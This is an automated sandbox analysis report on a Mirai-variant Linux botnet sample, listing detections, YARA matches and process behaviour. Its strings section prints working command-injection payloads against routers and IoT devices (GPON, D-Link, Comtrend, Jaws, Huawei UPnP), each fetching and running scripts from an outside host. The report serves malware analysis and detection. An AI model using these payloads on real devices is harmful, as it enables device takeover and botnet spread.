Linux Analysis Report
w9J4jyf7oY

Overview

General Information

Sample Name:	w9J4jyf7oY
Analysis ID:	679627
MD5:	bb2f72c63c8c0427d31a757dfa190260
SHA1:	035b12d2be4f11e9ebe390aadab1205a599c6432
SHA256:	2e717964f7f88a60459e708ac92be181d0c3899fd3ce6b60c34624b0402f78a0
Tags:	32elfmiraimotorola
Infos:

Detection

Mirai

Score:	64
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Mirai

Multi AV Scanner detection for submitted file

Yara signature match

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Uses the "uname" system call to query kernel version information (possible evasion)

Enumerates processes within the "proc" file system

Sample listens on a socket

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: w9J4jyf7oY

Avira: detected

Multi AV Scanner detection for submitted file

Source: w9J4jyf7oY	Virustotal: Detection: 58%			Perma Link
Source: w9J4jyf7oY	ReversingLabs: Detection: 62%

Sample listens on a socket

Source: /tmp/w9J4jyf7oY (PID: 6219)

Socket: 127.0.0.1::44455

Jump to behavior

Source: w9J4jyf7oY	String found in binary or memory: http://0.0.0.0/Cloud/Cloud.x86
Source: w9J4jyf7oY	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mips;
Source: w9J4jyf7oY	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.mpsl;chmod
Source: w9J4jyf7oY	String found in binary or memory: http://46.23.109.47/Cloud/Cloud.x86
Source: w9J4jyf7oY	String found in binary or memory: http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: w9J4jyf7oY	String found in binary or memory: http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$
Source: w9J4jyf7oY	String found in binary or memory: http://46.23.109.47/Cloud/Gpon.sh
Source: w9J4jyf7oY	String found in binary or memory: http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VI
Source: w9J4jyf7oY	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: w9J4jyf7oY	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: w9J4jyf7oY	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Yara signature match

Source: w9J4jyf7oY, type: SAMPLE	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac2401f000.00007fac24021000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac24021000.00007fac24022000.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13

Sample contains strings that are potentially command strings

Source: Initial sample	Potential command found: GET oV
Source: Initial sample	Potential command found: GET /ping.cgi?pingIpAddress=google.fr;wget%20http://46.23.109.47/Cloud/Comtrend.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114'$ HTTP/1.1
Source: Initial sample	Potential command found: GET /login.cgi?cli=aa%20aa%27;wget%20http://46.23.109.47/Cloud/Dlink.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+;wget+46.23.109.47/Cloud/Jaws.sh;chmod+777+;sh+Jaws.sh HTTP/1.1
Source: Initial sample	Potential command found: GET /boaform/admin/formPing?target_addr=;wget%20http://46.23.109.47/Cloud/Netlink.sh%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1
Source: Initial sample	Potential command found: GET /index.php?s=/index/hink

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://46.23.109.47/Cloud/Cloud.mips; chmod 777 Cloud.mips; ./Cloud.mips Cloud.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+vaicalon;chmod+777+*;sh+vaicalon`&ipv=0POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	String containing 'busybox' found: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://46.23.109.47/Cloud/Gpon.sh+-O+anngu;chmod+777+*;sh+anngu`&ipv=0POST /HNAP1/ HTTP/1.0

Source: classification engine

Classification label: mal64.troj.lin@0/0@0/0

Enumerates processes within the "proc" file system

Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6230/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6231/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2033/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2275/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6191/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6190/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1612/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1699/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1335/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1698/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2028/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1334/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/3236/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2025/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2146/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6227/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6229/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/517/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/759/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6228/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6241/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6243/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/4462/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6245/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6246/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2285/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2281/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1349/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1623/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/761/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1622/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/884/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1983/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2038/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1344/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1465/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1586/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1463/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2156/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6238/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/801/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6237/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1629/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1627/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1900/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6252/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/4470/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/4471/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6254/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/3021/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/491/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2294/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2050/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1877/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/772/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1633/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1599/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1632/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/774/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1477/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/896/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1476/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1872/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2048/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1475/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2289/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/777/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6249/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/6248/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/4468/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/4469/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/4502/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/936/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1639/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1638/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2208/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2180/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1809/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1494/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1890/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2063/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/2062/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1888/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1886/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/420/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1489/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/785/exe	Jump to behavior
Source: /tmp/w9J4jyf7oY (PID: 6221)	File opened: /proc/1642/exe	Jump to behavior

Uses the "uname" system call to query kernel version information (possible evasion)

Source: /tmp/w9J4jyf7oY (PID: 6219)

Queries kernel information via 'uname':

Jump to behavior

Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k
Source: w9J4jyf7oY, 6219.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp, w9J4jyf7oY, 6222.1.00007ffeb0ce0000.00007ffeb0d01000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-m68k/tmp/w9J4jyf7oYSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/w9J4jyf7oY
Source: w9J4jyf7oY, 6219.1.0000560d943cf000.0000560d94454000.rw-.sdmp, w9J4jyf7oY, 6222.1.0000560d943cf000.0000560d94454000.rw-.sdmp	Binary or memory string: V!/etc/qemu-binfmt/m68k

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: w9J4jyf7oY, type: SAMPLE
Source: Yara match	File source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: w9J4jyf7oY, type: SAMPLE
Source: Yara match	File source: 6222.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6219.1.00007fac24001000.00007fac2401e000.r-x.sdmp, type: MEMORY

Screenshots

No Screenshots

Network Map

⊘No contacted IP infos

ID:	679627
Product:	CloudBasic
Start time:	07:13:57
Start date:	06.08.2022
Sample:	w9J4jyf7oY
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	bb2f72c63c8c0427d31a757dfa190260
SHA1:	035b12d2be4f11e9ebe390aadab1205a599c6432
SHA256:	2e717964f7f88a60459e708ac92be181d0c3899fd3ce6b60c34624b0402f78a0
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Linux Analysis Report
w9J4jyf7oY

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Linux Analysis Report w9J4jyf7oY

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Linux Analysis Report
w9J4jyf7oY